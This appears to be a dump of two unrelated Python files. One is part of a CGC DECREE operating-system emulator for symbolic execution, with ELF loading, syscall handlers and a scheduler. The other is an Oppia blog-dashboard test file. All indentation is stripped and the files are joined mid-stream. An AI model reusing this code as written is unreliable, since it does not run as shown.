self.rwait = state['rwait']
self.twait = state['twait']
self.timers = state['timers']
self.clocks = state['clocks']
self.syscall_trace = state['syscall_trace']
# Install event forwarders
for proc in self.procs:
self.forward_events_from(proc)
def _read_string(self, cpu, buf):
"""
Reads a null terminated concrete buffer form memory
:todo: FIX. move to cpu or memory
"""
filename = ""
for i in xrange(0, 1024):
c = Operators.CHR(cpu.read_int(buf + i, 8))
if c == '\x00':
break
filename += c
return filename
def load(self, filename):
'''
Loads a CGC-ELF program in memory and prepares the initial CPU state
and the stack.
:param filename: pathname of the file to be executed.
'''
CGC_MIN_PAGE_SIZE = 4096
CGC_MIN_ALIGN = CGC_MIN_PAGE_SIZE
TASK_SIZE = 0x80000000
def CGC_PAGESTART(_v):
return ((_v) & ~ (CGC_MIN_ALIGN - 1))
def CGC_PAGEOFFSET(_v):
return ((_v) & (CGC_MIN_ALIGN - 1))
def CGC_PAGEALIGN(_v):
return (((_v) + CGC_MIN_ALIGN - 1) & ~(CGC_MIN_ALIGN - 1))
def BAD_ADDR(x):
return ((x) >= TASK_SIZE)
# load elf See https://github.com/CyberdyneNYC/linux-source-3.13.2-cgc/blob/master/fs/binfmt_cgc.c
# read the ELF object file
cgc = CGCElf(filename)
logger.info("Loading %s as a %s elf" % (filename, cgc.arch))
# make cpu and memory (Only 1 thread in Decree)
cpu = self._mk_proc()
bss = brk = 0
start_code = 0xffffffff
end_code = start_data = end_data = 0
for (vaddr, memsz, perms, name, offset, filesz) in cgc.maps():
if vaddr < start_code:
start_code = vaddr
if start_data < vaddr:
start_data = vaddr
if vaddr > TASK_SIZE or filesz > memsz or \
memsz > TASK_SIZE or TASK_SIZE - memsz < vaddr:
raise Exception("Set_brk can never work. avoid overflows")
# CGCMAP--
addr = None
if filesz > 0:
hint = CGC_PAGESTART(vaddr)
size = CGC_PAGEALIGN(filesz + CGC_PAGEOFFSET(vaddr))
offset = CGC_PAGESTART(offset)
addr = cpu.memory.mmapFile(hint, size, perms, name, offset)
assert not BAD_ADDR(addr)
lo = CGC_PAGEALIGN(vaddr + filesz)
hi = CGC_PAGEALIGN(vaddr + memsz)
else:
# for 0 filesz, we have to include the first page as bss.
lo = CGC_PAGESTART(vaddr + filesz)
hi = CGC_PAGEALIGN(vaddr + memsz)
# map anon pages for the rest (no prefault)
if hi - lo > 0:
zaddr = cpu.memory.mmap(lo, hi - lo, perms)
assert not BAD_ADDR(zaddr)
lo = vaddr + filesz
hi = CGC_PAGEALIGN(vaddr + memsz)
if hi - lo > 0:
old_perms = cpu.memory.perms(lo)
cpu.memory.mprotect(lo, hi - lo, 'rw')
try:
cpu.memory[lo:hi] = '\x00' * (hi - lo)
except Exception as e:
logger.debug("Exception zeroing main elf fractional pages: %s" % str(e))
cpu.memory.mprotect(lo, hi, old_perms)
if addr is None:
addr = zaddr
assert addr is not None
k = vaddr + filesz
if k > bss:
bss = k
if 'x' in perms and end_code < k:
end_code = k
if end_data < k:
end_data = k
k = vaddr + memsz
if k > brk:
brk = k
bss = brk
stack_base = 0xbaaaaffc
stack_size = 0x800000
stack = cpu.memory.mmap(0xbaaab000 - stack_size, stack_size, 'rwx') + stack_size - 4
assert (stack_base) in cpu.memory and (stack_base - stack_size + 4) in cpu.memory
# Only one thread in Decree
status, thread = next(cgc.threads())
assert status == 'Running'
logger.info("Setting initial cpu state")
# set initial CPU state
cpu.write_register('EAX', 0x0)
cpu.write_register('ECX', 0x0)
cpu.write_register('EDX', 0x0)
cpu.write_register('EBX', 0x0)
cpu.write_register('ESP', stack)
cpu.write_register('EBP', 0x0)
cpu.write_register('ESI', 0x0)
cpu.write_register('EDI', 0x0)
cpu.write_register('EIP', thread['EIP'])
cpu.write_register('RFLAGS', 0x202)
cpu.write_register('CS', 0x0)
cpu.write_register('SS', 0x0)
cpu.write_register('DS', 0x0)
cpu.write_register('ES', 0x0)
cpu.write_register('FS', 0x0)
cpu.write_register('GS', 0x0)
cpu.memory.mmap(0x4347c000, 0x1000, 'r')
# cpu.memory[0x4347c000:0x4347d000] = 'A' * 0x1000
logger.info("Entry point: %016x", cpu.EIP)
logger.info("Stack start: %016x", cpu.ESP)
logger.info("Brk: %016x", brk)
logger.info("Mappings:")
for m in str(cpu.memory).split('\n'):
logger.info(" %s", m)
return [cpu]
def _open(self, f):
if None in self.files:
fd = self.files.index(None)
self.files[fd] = f
else:
fd = len(self.files)
self.files.append(f)
return fd
def _close(self, fd):
'''
Closes a file descriptor
:rtype: int
:param fd: the file descriptor to close.
:return: C{0} on success.
'''
self.files[fd] = None
def _dup(self, fd):
'''
Duplicates a file descriptor
:rtype: int
:param fd: the file descriptor to duplicate.
:return: the new file descriptor.
'''
return self._open(self.files[fd])
def _is_open(self, fd):
return fd >= 0 and fd < len(self.files) and self.files[fd] is not None
def sys_allocate(self, cpu, length, isX, addr):
''' allocate - allocate virtual memory
The allocate system call creates a new allocation in the virtual address
space of the calling process. The length argument specifies the length of
the allocation in bytes which will be rounded up to the hardware page size.
The kernel chooses the address at which to create the allocation; the
address of the new allocation is returned in *addr as the result of the call.
All newly allocated memory is readable and writeable. In addition, the
is_X argument is a boolean that allows newly allocated memory to be marked
as executable (non-zero) or non-executable (zero).
The allocate function is invoked through system call number 5.
:param cpu: current CPU
:param length: the length of the allocation in bytes
:param isX: boolean that allows newly allocated memory to be marked as executable
:param addr: the address of the new allocation is returned in *addr
:return: On success, allocate returns zero and a pointer to the allocated area
is returned in *addr. Otherwise, an error code is returned
and *addr is undefined.
EINVAL length is zero.
EINVAL length is too large.
EFAULT addr points to an invalid address.
ENOMEM No memory is available or the process' maximum number of allocations
would have been exceeded.
'''
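# Guest-side convention, as wired up in int80() below: the program issues
# int 0x80 with EAX=5, EBX=length, ECX=is_X and EDX holding the address of
# a 4-byte slot that receives the start of the new allocation.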
# TODO: check 4 bytes from addr
if addr not in cpu.memory:
logger.info("ALLOCATE: addr points to invalid address. Returning EFAULT")
return Decree.CGC_EFAULT
perms = ['rw ', 'rwx'][bool(isX)]
try:
result = cpu.memory.mmap(None, length, perms)
except Exception as e:
logger.info("ALLOCATE exception %s. Returning ENOMEM %r", str(e), length)
return Decree.CGC_ENOMEM
cpu.write_int(addr, result, 32)
logger.info("ALLOCATE(%d, %s, 0x%08x) -> 0x%08x" % (length, perms, addr, result))
self.syscall_trace.append(("_allocate", -1, length))
return 0
def sys_random(self, cpu, buf, count, rnd_bytes):
''' random - fill a buffer with random data
The random system call populates the buffer referenced by buf with up to
count bytes of random data. If count is zero, random returns 0 and optionally
sets *rnd_bytes to zero. If count is greater than SSIZE_MAX, the result is unspecified.
:param cpu: current CPU
:param buf: a memory buffer
:param count: max number of bytes to receive
:param rnd_bytes: if valid, points to the actual number of random bytes
:return: 0 On success
EINVAL count is invalid.
EFAULT buf or rnd_bytes points to an invalid address.
'''
ret = 0
if count != 0:
if count > Decree.CGC_SSIZE_MAX or count < 0:
ret = Decree.CGC_EINVAL
else:
# TODO check count bytes from buf
if buf not in cpu.memory or (buf + count) not in cpu.memory:
logger.info("RANDOM: buf points to invalid address. Returning EFAULT")
return Decree.CGC_EFAULT
data = file("/dev/urandom", "r").read(count)
self.syscall_trace.append(("_random", -1, data))
cpu.write_bytes(buf, data)
# TODO check 4 bytes from rnd_bytes
if rnd_bytes:
if rnd_bytes not in cpu.memory:
logger.info("RANDOM: Not valid rnd_bytes. Returning EFAULT")
return Decree.CGC_EFAULT
cpu.write_int(rnd_bytes, len(data), 32)
logger.info("RANDOM(0x%08x, %d, 0x%08x) -> <%s>)" % (buf, count, rnd_bytes, repr(data[:10])))
return ret
def sys_receive(self, cpu, fd, buf, count, rx_bytes):
''' receive - receive bytes from a file descriptor
The receive system call reads up to count bytes from file descriptor fd to the
buffer pointed to by buf. If count is zero, receive returns 0 and optionally
sets *rx_bytes to zero.
:param cpu: current CPU.
:param fd: a valid file descriptor
:param buf: a memory buffer
:param count: max number of bytes to receive
:param rx_bytes: if valid, points to the actual number of bytes received
:return: 0 Success
EBADF fd is not a valid file descriptor or is not open
EFAULT buf or rx_bytes points to an invalid address.
'''
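# Blocking behaviour (see below): a receive on an empty socketpair fd (> 2)
# rewinds EIP, parks the process on the fd's read wait list and raises
# RestartSyscall, so the instruction is re-executed once data arrives.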
data = ''
if count != 0:
if not self._is_open(fd):
logger.info("RECEIVE: Not valid file descriptor on receive. Returning EBADF")
return Decree.CGC_EBADF
# TODO check count bytes from buf
if buf not in cpu.memory: # or not buf+count in cpu.memory:
logger.info("RECEIVE: buf points to invalid address. Returning EFAULT")
return Decree.CGC_EFAULT
#import random
#count = random.randint(1,count)
if fd > 2 and self.files[fd].is_empty():
cpu.PC -= cpu.instruction.size
self.wait([fd], [], None)
raise RestartSyscall()
# get some potential delay
# if random.randint(5) == 0 and count > 1:
# count = count/2
# Read the data and put it in memory
data = self.files[fd].receive(count)
self.syscall_trace.append(("_receive", fd, data))
cpu.write_bytes(buf, data)
self.signal_receive(fd)
# TODO check 4 bytes from rx_bytes
if rx_bytes:
if rx_bytes not in cpu.memory:
logger.info("RECEIVE: Not valid file descriptor on receive. Returning EFAULT")
return Decree.CGC_EFAULT
cpu.write_int(rx_bytes, len(data), 32)
logger.info("RECEIVE(%d, 0x%08x, %d, 0x%08x) -> <%s> (size:%d)" % (fd, buf, count, rx_bytes, repr(data)[:min(count, 10)], len(data)))
return 0
def sys_transmit(self, cpu, fd, buf, count, tx_bytes):
''' transmit - send bytes through a file descriptor
The transmit system call writes up to count bytes from the buffer pointed
to by buf to the file descriptor fd. If count is zero, transmit returns 0
and optionally sets *tx_bytes to zero.
:param cpu: current CPU
:param fd: a valid file descriptor
:param buf: a memory buffer
:param count: number of bytes to send
:param tx_bytes: if valid, points to the actual number of bytes transmitted
:return: 0 Success
EBADF fd is not a valid file descriptor or is not open.
EFAULT buf or tx_bytes points to an invalid address.
'''
data = []
if count != 0:
if not self._is_open(fd):
logger.error("TRANSMIT: Not valid file descriptor. Returning EBADFD %d", fd)
return Decree.CGC_EBADF
# TODO check count bytes from buf
if buf not in cpu.memory or (buf + count) not in cpu.memory:
logger.debug("TRANSMIT: buf points to invalid address. Rerurning EFAULT")
return Decree.CGC_EFAULT
if fd > 2 and self.files[fd].is_full():
cpu.PC -= cpu.instruction.size
self.wait([], [fd], None)
raise RestartSyscall()
for i in xrange(0, count):
value = Operators.CHR(cpu.read_int(buf + i, 8))
if not isinstance(value, str):
logger.debug("TRANSMIT: Writing symbolic values to file %d", fd)
#value = str(value)
data.append(value)
self.files[fd].transmit(data)
logger.info("TRANSMIT(%d, 0x%08x, %d, 0x%08x) -> <%.24r>" % (fd, buf, count, tx_bytes, ''.join([str(x) for x in data])))
self.syscall_trace.append(("_transmit", fd, data))
self.signal_transmit(fd)
# TODO check 4 bytes from tx_bytes
if tx_bytes:
if tx_bytes not in cpu.memory:
logger.debug("TRANSMIT: Not valid tx_bytes pointer on transmit. Returning EFAULT")
return Decree.CGC_EFAULT
cpu.write_int(tx_bytes, len(data), 32)
return 0
def sys_terminate(self, cpu, error_code):
'''
Exits all threads in a process
:param cpu: current CPU.
:raises Exception: 'Finished'
'''
procid = self.procs.index(cpu)
self.sched()
self.running.remove(procid)
# self.procs[procid] = None #let it there so we can report?
if issymbolic(error_code):
logger.info("TERMINATE PROC_%02d with symbolic exit code [%d,%d]", procid, solver.minmax(self.constraints, error_code))
else:
logger.info("TERMINATE PROC_%02d %x", procid, error_code)
if len(self.running) == 0:
raise TerminateState('Process exited correctly. Code: {}'.format(error_code))
return error_code
def sys_deallocate(self, cpu, addr, size):
''' deallocate - remove allocations
The deallocate system call deletes the allocations for the specified
address range, and causes further references to the addresses within the
range to generate invalid memory accesses. The region is also
automatically deallocated when the process is terminated.
The address addr must be a multiple of the page size. The length parameter
specifies the size of the region to be deallocated in bytes. All pages
containing a part of the indicated range are deallocated, and subsequent
references will terminate the process. It is not an error if the indicated
range does not contain any allocated pages.
The deallocate function is invoked through system call number 6.
:param cpu: current CPU
:param addr: the starting address to unmap.
:param size: the size of the portion to unmap.
:return 0 On success
EINVAL addr is not page aligned.
EINVAL length is zero.
EINVAL any part of the region being deallocated is outside the valid
address range of the process.
:param cpu: current CPU.
:return: C{0} on success.
'''
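# Illustrative example of the checks below: addr=0x1000, size=0x1000 is a
# valid request, while addr=0x1004 fails with EINVAL because it is not
# aligned to the 4 KiB page size.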
logger.info("DEALLOCATE(0x%08x, %d)" % (addr, size))
if addr & 0xfff != 0:
logger.info("DEALLOCATE: addr is not page aligned")
return Decree.CGC_EINVAL
if size == 0:
logger.info("DEALLOCATE:length is zero")
return Decree.CGC_EINVAL
# unlikely AND WRONG!!!
# if addr > Decree.CGC_SSIZE_MAX or addr+size > Decree.CGC_SSIZE_MAX:
# logger.info("DEALLOCATE: part of the region being deallocated is outside the valid address range of the process")
# return Decree.CGC_EINVAL
cpu.memory.munmap(addr, size)
self.syscall_trace.append(("_deallocate", -1, size))
return 0
def sys_fdwait(self, cpu, nfds, readfds, writefds, timeout, readyfds):
''' fdwait - wait for file descriptors to become ready
'''
logger.debug("FDWAIT(%d, 0x%08x, 0x%08x, 0x%08x, 0x%08x)" % (nfds, readfds, writefds, timeout, readyfds))
if timeout:
if timeout not in cpu.memory: # todo: size
logger.info("FDWAIT: timeput is pointing to invalid memory. Returning EFAULT")
return Decree.CGC_EFAULT
if readyfds:
if readyfds not in cpu.memory:
logger.info("FDWAIT: readyfds pointing to invalid memory. Returning EFAULT")
return Decree.CGC_EFAULT
writefds_wait = set()
writefds_ready = set()
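# Round nfds up to a whole number of bytes; each fd_set is then read as a
# single integer of that many bits, one bit per file descriptor.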
fds_bitsize = (nfds + 7) & ~7
if writefds:
if writefds not in cpu.memory:
logger.info("FDWAIT: writefds pointing to invalid memory. Returning EFAULT")
return Decree.CGC_EFAULT
bits = cpu.read_int(writefds, fds_bitsize)
for fd in range(nfds):
if (bits & 1 << fd):
if self.files[fd].is_full():
writefds_wait.add(fd)
else:
writefds_ready.add(fd)
readfds_wait = set()
readfds_ready = set()
if readfds:
if readfds not in cpu.memory:
logger.info("FDWAIT: readfds pointing to invalid memory. Returning EFAULT")
return Decree.CGC_EFAULT
bits = cpu.read_int(readfds, fds_bitsize)
for fd in range(nfds):
if (bits & 1 << fd):
if self.files[fd].is_empty():
readfds_wait.add(fd)
else:
readfds_ready.add(fd)
n = len(readfds_ready) + len(writefds_ready)
if n == 0:
# TODO FIX timout symbolic
if timeout != 0:
seconds = cpu.read_int(timeout, 32)
microseconds = cpu.read_int(timeout + 4, 32)
logger.info("FDWAIT: waiting for read on fds: {%s} and write to: {%s} timeout: %d", repr(
list(readfds_wait)), repr(list(writefds_wait)), microseconds + 1000 * seconds)
to = microseconds + 1000 * seconds
# no ready file, wait
else:
to = None
logger.info("FDWAIT: waiting for read on fds: {%s} and write to: {%s} timeout: INDIFENITELY",
repr(list(readfds_wait)), repr(list(writefds_wait)))
cpu.PC -= cpu.instruction.size
self.wait(readfds_wait, writefds_wait, to)
raise RestartSyscall()  # When coming back from a timeout, remember
# not to backtrack the instruction and to set EAX to 0! :( ugliness alert!
if readfds:
bits = 0
for fd in readfds_ready:
bits |= 1 << fd
for byte in range(0, nfds, 8):
cpu.write_int(readfds, (bits >> byte) & 0xff, 8)
if writefds:
bits = 0
for fd in writefds_ready:
bits |= 1 << fd
for byte in range(0, nfds, 8):
cpu.write_int(writefds, (bits >> byte) & 0xff, 8)
logger.info("FDWAIT: continuing. Some file is ready Readyfds: %08x", readyfds)
if readyfds:
cpu.write_int(readyfds, n, 32)
self.syscall_trace.append(("_fdwait", -1, None))
return 0
def int80(self, cpu):
'''
32 bit dispatcher.
:param cpu: current CPU.
_terminate, transmit, receive, fdwait, allocate, deallocate and random
'''
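# Dispatch convention used below: EAX selects the system call and the
# arguments are taken, in order, from EBX, ECX, EDX, ESI, EDI and EBP;
# the return value is written back to EAX.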
syscalls = {0x00000001: self.sys_terminate,
0x00000002: self.sys_transmit,
0x00000003: self.sys_receive,
0x00000004: self.sys_fdwait,
0x00000005: self.sys_allocate,
0x00000006: self.sys_deallocate,
0x00000007: self.sys_random,
}
if cpu.EAX not in syscalls.keys():
raise TerminateState("32 bit DECREE system call number {} Not Implemented".format(cpu.EAX))
func = syscalls[cpu.EAX]
logger.debug("SYSCALL32: %s (nargs: %d)", func.func_name, func.func_code.co_argcount)
nargs = func.func_code.co_argcount
args = [cpu, cpu.EBX, cpu.ECX, cpu.EDX, cpu.ESI, cpu.EDI, cpu.EBP]
cpu.EAX = func(*args[:nargs - 1])
def sched(self):
''' Yield CPU.
This will choose another process from the RUNNING list and change
the current running process. May return the same cpu if only one
process is running.
'''
if len(self.procs) > 1:
logger.info("SCHED:")
logger.info("\tProcess: %r", self.procs)
logger.info("\tRunning: %r", self.running)
logger.info("\tRWait: %r", self.rwait)
logger.info("\tTWait: %r", self.twait)
logger.info("\tTimers: %r", self.timers)
logger.info("\tCurrent clock: %d", self.clocks)
logger.info("\tCurrent cpu: %d", self._current)
if len(self.running) == 0:
logger.info("None running checking if there is some process waiting for a timeout")
if all([x is None for x in self.timers]):
raise Deadlock()
self.clocks = min(filter(lambda x: x is not None, self.timers)) + 1
self.check_timers()
assert len(self.running) != 0, "DEADLOCK!"
self._current = self.running[0]
return
next_index = (self.running.index(self._current) + 1) % len(self.running)
next = self.running[next_index]
if len(self.procs) > 1:
logger.info("\tTransfer control from process %d to %d", self._current, next)
self._current = next
def wait(self, readfds, writefds, timeout):
''' Wait for file descriptors or timeout.
Adds the current process to the corresponding waiting lists and
yields the cpu to another running process.
'''
logger.info("WAIT:")
logger.info("\tProcess %d is going to wait for [ %r %r %r ]", self._current, readfds, writefds, timeout)
logger.info("\tProcess: %r", self.procs)
logger.info("\tRunning: %r", self.running)
logger.info("\tRWait: %r", self.rwait)
logger.info("\tTWait: %r", self.twait)
logger.info("\tTimers: %r", self.timers)
for fd in readfds:
self.rwait[fd].add(self._current)
for fd in writefds:
self.twait[fd].add(self._current)
if timeout is not None:
self.timers[self._current] = self.clocks + timeout
else:
self.timers[self._current] = None
procid = self._current
# self.sched()
next_index = (self.running.index(procid) + 1) % len(self.running)
self._current = self.running[next_index]
logger.info("\tTransfer control from process %d to %d", procid, self._current)
logger.info("\tREMOVING %r from %r. Current: %r", procid, self.running, self._current)
self.running.remove(procid)
if self._current not in self.running:
logger.info("\tCurrent not running. Checking for timers...")
self._current = None
if all([x is None for x in self.timers]):
raise Deadlock()
self.check_timers()
def awake(self, procid):
''' Remove procid from waitlists and re-establish it in the running list '''
logger.info("Remove procid:%d from waitlists and re-establish it in the running list", procid)
for wait_list in self.rwait:
if procid in wait_list:
wait_list.remove(procid)
for wait_list in self.twait:
if procid in wait_list:
wait_list.remove(procid)
self.timers[procid] = None
self.running.append(procid)
if self._current is None:
self._current = procid
def connections(self, fd):
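# Fds 0-2 are the standard streams and have no partner; socket pairs are
# opened in consecutive slots (see __init__), so the peer of fd 3 is 4,
# of 5 is 6, and so on.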
if fd in [0, 1, 2]:
return None
if fd % 2:
return fd + 1
else:
return fd - 1
def signal_receive(self, fd):
''' Awake one process waiting to receive data on fd '''
connections = self.connections
if connections(fd) and self.twait[connections(fd)]:
procid = random.sample(self.twait[connections(fd)], 1)[0]
self.awake(procid)
def signal_transmit(self, fd):
''' Awake one process waiting to transmit data on fd '''
connections = self.connections
if connections(fd) and self.rwait[connections(fd)]:
procid = random.sample(self.rwait[connections(fd)], 1)[0]
self.awake(procid)
def check_timers(self):
''' Awake processes whose timers have expired '''
if self._current is None:
# Advance the clocks. Go to future!!
advance = min(filter(lambda x: x is not None, self.timers)) + 1
logger.info("Advancing the clock from %d to %d", self.clocks, advance)
self.clocks = advance
for procid in range(len(self.timers)):
if self.timers[procid] is not None:
if self.clocks > self.timers[procid]:
self.procs[procid].PC += self.procs[procid].instruction.size
self.awake(procid)
def execute(self):
"""
Execute one cpu instruction in the current thread (only one supported).
:rtype: bool
:return: C{True}
:todo: This is where we could implement a simple schedule.
"""
try:
self.current.execute()
self.clocks += 1
if self.clocks % 10000 == 0:
self.check_timers()
self.sched()
except Interruption as e:
if e.N != 0x80:
raise
try:
self.int80(self.current)
except RestartSyscall:
pass
return True
############################################################################
# Symbolic versions follow
class SDecree(Decree):
'''
A symbolic extension of a Decree Operating System.
'''
def __init__(self, constraints, programs, symbolic_random=None):
'''
Builds a symbolic extension of a Decree OS
:param constraints: a constraint set
:param cpus: CPU for this platform
:param mem: memory for this platform
'''
self.random = 0
self._constraints = constraints
super(SDecree, self).__init__(programs)
def _mk_proc(self):
return I386Cpu(SMemory32(self.constraints))
@property
def constraints(self):
return self._constraints
@constraints.setter
def constraints(self, constraints):
self._constraints = constraints
for proc in self.procs:
proc.memory.constraints = constraints
# marshaling/pickle
def __getstate__(self):
state = super(SDecree, self).__getstate__()
state['constraints'] = self.constraints
state['random'] = self.random
return state
def __setstate__(self, state):
self._constraints = state['constraints']
self.random = state['random']
super(SDecree, self).__setstate__(state)
def sys_receive(self, cpu, fd, buf, count, rx_bytes):
''' Symbolic version of Decree.sys_receive
'''
if issymbolic(fd):
logger.info("Ask to read from a symbolic file descriptor!!")
cpu.PC = cpu.PC - cpu.instruction.size
raise SymbolicSyscallArgument(cpu, 0)
if issymbolic(buf):
logger.info("Ask to read to a symbolic buffer")
cpu.PC = cpu.PC - cpu.instruction.size
raise SymbolicSyscallArgument(cpu, 1)
if issymbolic(count):
logger.info("Ask to read a symbolic number of bytes ")
cpu.PC = cpu.PC - cpu.instruction.size
raise SymbolicSyscallArgument(cpu, 2)
if issymbolic(rx_bytes):
logger.info("Ask to return size to a symbolic address ")
cpu.PC = cpu.PC - cpu.instruction.size
raise SymbolicSyscallArgument(cpu, 3)
return super(SDecree, self).sys_receive(cpu, fd, buf, count, rx_bytes)
def sys_transmit(self, cpu, fd, buf, count, tx_bytes):
''' Symbolic version of Decree.sys_transmit
'''
if issymbolic(fd):
logger.info("Ask to write to a symbolic file descriptor!!")
cpu.PC = cpu.PC - cpu.instruction.size
raise SymbolicSyscallArgument(cpu, 0)
if issymbolic(buf):
logger.info("Ask to write to a symbolic buffer")
cpu.PC = cpu.PC - cpu.instruction.size
raise SymbolicSyscallArgument(cpu, 1)
if issymbolic(count):
logger.info("Ask to write a symbolic number of bytes ")
cpu.PC = cpu.PC - cpu.instruction.size
raise SymbolicSyscallArgument(cpu, 2)
if issymbolic(tx_bytes):
logger.info("Ask to return size to a symbolic address ")
cpu.PC = cpu.PC - cpu.instruction.size
raise SymbolicSyscallArgument(cpu, 3)
return super(SDecree, self).sys_transmit(cpu, fd, buf, count, tx_bytes)
def sys_allocate(self, cpu, length, isX, address_p):
if issymbolic(length):
logger.info("Ask to ALLOCATE a symbolic number of bytes ")
cpu.PC = cpu.PC - cpu.instruction.size
raise SymbolicSyscallArgument(cpu, 0)
if issymbolic(isX):
logger.info("Ask to ALLOCATE potentially executable or not executable memory")
cpu.PC = cpu.PC - cpu.instruction.size
raise SymbolicSyscallArgument(cpu, 1)
if issymbolic(address_p):
logger.info("Ask to return ALLOCATE result to a symbolic reference ")
cpu.PC = cpu.PC - cpu.instruction.size
raise SymbolicSyscallArgument(cpu, 2)
return super(SDecree, self).sys_allocate(cpu, length, isX, address_p)
def sys_deallocate(self, cpu, addr, size):
if issymbolic(addr):
logger.info("Ask to DEALLOCATE a symbolic pointer?!")
cpu.PC = cpu.PC - cpu.instruction.size
raise SymbolicSyscallArgument(cpu, 0)
if issymbolic(size):
logger.info("Ask to DEALLOCATE a symbolic size?!")
cpu.PC = cpu.PC - cpu.instruction.size
raise SymbolicSyscallArgument(cpu, 1)
return super(SDecree, self).sys_deallocate(cpu, addr, size)
def sys_random(self, cpu, buf, count, rnd_bytes):
if issymbolic(buf):
logger.info("Ask to write random bytes to a symbolic buffer")
cpu.PC = cpu.PC - cpu.instruction.size
raise SymbolicSyscallArgument(cpu, 0)
if issymbolic(count):
logger.info("Ask to read a symbolic number of random bytes ")
cpu.PC = cpu.PC - cpu.instruction.size
raise SymbolicSyscallArgument(cpu, 1)
if issymbolic(rnd_bytes):
logger.info("Ask to return rnd size to a symbolic address ")
cpu.PC = cpu.PC - cpu.instruction.size
raise SymbolicSyscallArgument(cpu, 2)
data = []
for i in xrange(count):
if False:
# Too slow for the new age.
value = self.constraints.new_bitvec(8, name="RANDOM_%04d" % self.random)
self.constraints.add(value == cgcrandom.stream[self.random])
else:
value = cgcrandom.stream[self.random]
data.append(value)
self.random += 1
cpu.write_bytes(buf, data)
if rnd_bytes:
cpu.write_int(rnd_bytes, len(data), 32)
logger.info("RANDOM(0x%08x, %d, 0x%08x) -> %d", buf, count, rnd_bytes, len(data))
return 0
class DecreeEmu(object):
RANDOM = 0
@staticmethod
def cgc_initialize_secret_page(platform):
logger.info("Skipping: cgc_initialize_secret_page()")
return 0
@staticmethod
def cgc_random(platform, buf, count, rnd_bytes):
import cgcrandom
if issymbolic(buf):
logger.info("Ask to write random bytes to a symbolic buffer")
raise ConcretizeArgument(platform.current, 0)
if issymbolic(count):
logger.info("Ask to read a symbolic number of random bytes ")
raise ConcretizeArgument(platform.current, 1)
if issymbolic(rnd_bytes):
logger.info("Ask to return rnd size to a symbolic address ")
raise ConcretizeArgument(platform.current, 2)
data = []
for i in xrange(count):
value = cgcrandom.stream[DecreeEmu.RANDOM]
data.append(value)
DecreeEmu.RANDOM += 1
cpu = platform.current
cpu.write(buf, data)
if rnd_bytes:
cpu.store(rnd_bytes, len(data), 32)
logger.info("RANDOM(0x%08x, %d, 0x%08x) -> %d", buf, count, rnd_bytes, len(data))
return 0
|
py | 1a4a19b65efe02d55101cdf4d733297e7cd7266f | # Copyright 2021 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for the blog dashboard page."""
from __future__ import absolute_import
from __future__ import unicode_literals
import os
from core.domain import blog_services
from core.tests import test_utils
import feconf
import python_utils
import utils
class BlogDashboardPageTests(test_utils.GenericTestBase):
"""Checks the access to the blog dashboard page and its rendering."""
def test_blog_dashboard_page_access_without_logging_in(self):
"""Tests access to the Blog Dashboard page."""
self.get_html_response('/blog-dashboard', expected_status_int=302)
def test_blog_dashboard_page_access_without_having_rights(self):
self.signup(self.VIEWER_EMAIL, self.VIEWER_USERNAME)
self.login(self.VIEWER_EMAIL)
self.get_html_response('/blog-dashboard', expected_status_int=401)
self.logout()
def test_blog_dashboard_page_access_as_blog_admin(self):
self.signup(self.BLOG_ADMIN_EMAIL, self.BLOG_ADMIN_USERNAME)
self.add_user_role(
self.BLOG_ADMIN_USERNAME, feconf.ROLE_ID_BLOG_ADMIN)
self.login(self.BLOG_ADMIN_EMAIL)
self.get_html_response('/blog-dashboard', expected_status_int=200)
self.logout()
def test_blog_dashboard_page_access_as_blog_post_editor(self):
self.signup(self.BLOG_EDITOR_EMAIL, self.BLOG_EDITOR_USERNAME)
self.add_user_role(
self.BLOG_EDITOR_USERNAME, feconf.ROLE_ID_BLOG_POST_EDITOR)
self.login(self.BLOG_EDITOR_EMAIL)
self.get_html_response('/blog-dashboard', expected_status_int=200)
self.logout()
class BlogDashboardDataHandlerTests(test_utils.GenericTestBase):
username = 'user'
user_email = '[email protected]'
def setUp(self):
"""Completes the sign-up process for the various users."""
super(BlogDashboardDataHandlerTests, self).setUp()
self.signup(
self.BLOG_ADMIN_EMAIL, self.BLOG_ADMIN_USERNAME)
self.signup(
self.BLOG_EDITOR_EMAIL, self.BLOG_EDITOR_USERNAME)
self.signup(self.user_email, self.username)
self.add_user_role(
self.BLOG_ADMIN_USERNAME, feconf.ROLE_ID_BLOG_ADMIN)
self.add_user_role(
self.BLOG_EDITOR_USERNAME,
feconf.ROLE_ID_BLOG_POST_EDITOR)
self.blog_admin_id = (
self.get_user_id_from_email(self.BLOG_ADMIN_EMAIL))
self.blog_editor_id = (
self.get_user_id_from_email(self.BLOG_EDITOR_EMAIL))
def test_get_dashboard_page_data(self):
# Checks blog editor can access blog dashboard.
self.login(self.BLOG_EDITOR_EMAIL)
json_response = self.get_json(
'%s' % (feconf.BLOG_DASHBOARD_DATA_URL),
)
self.assertEqual(self.BLOG_EDITOR_USERNAME, json_response['username'])
self.assertEqual(json_response['published_blog_post_summary_dicts'], [])
self.assertEqual(json_response['draft_blog_post_summary_dicts'], [])
self.logout()
# Checks blog admin can access blog dashboard.
self.login(self.BLOG_ADMIN_EMAIL)
json_response = self.get_json(
'%s' % (feconf.BLOG_DASHBOARD_DATA_URL),
)
self.assertEqual(self.BLOG_ADMIN_USERNAME, json_response['username'])
self.assertEqual(json_response['published_blog_post_summary_dicts'], [])
self.assertEqual(json_response['draft_blog_post_summary_dicts'], [])
self.logout()
# Checks non blog-admins and non-editors can not access blog dashboard.
self.login(self.user_email)
json_response = self.get_json(
'%s' % (feconf.BLOG_DASHBOARD_DATA_URL), expected_status_int=401)
self.logout()
# Checks for correct published and draft blog post summary data.
blog_post = blog_services.create_new_blog_post(self.blog_editor_id)
change_dict = {
'title': 'Sample Title',
'thumbnail_filename': 'thumbnail.svg',
'content': '<p>Hello Bloggers<p>',
'tags': ['Newsletter', 'Learners']
}
self.login(self.BLOG_EDITOR_EMAIL)
json_response = self.get_json(
'%s' % (feconf.BLOG_DASHBOARD_DATA_URL))
self.assertEqual(self.BLOG_EDITOR_USERNAME, json_response['username'])
self.assertEqual(
blog_post.id,
json_response['draft_blog_post_summary_dicts'][0]['id'])
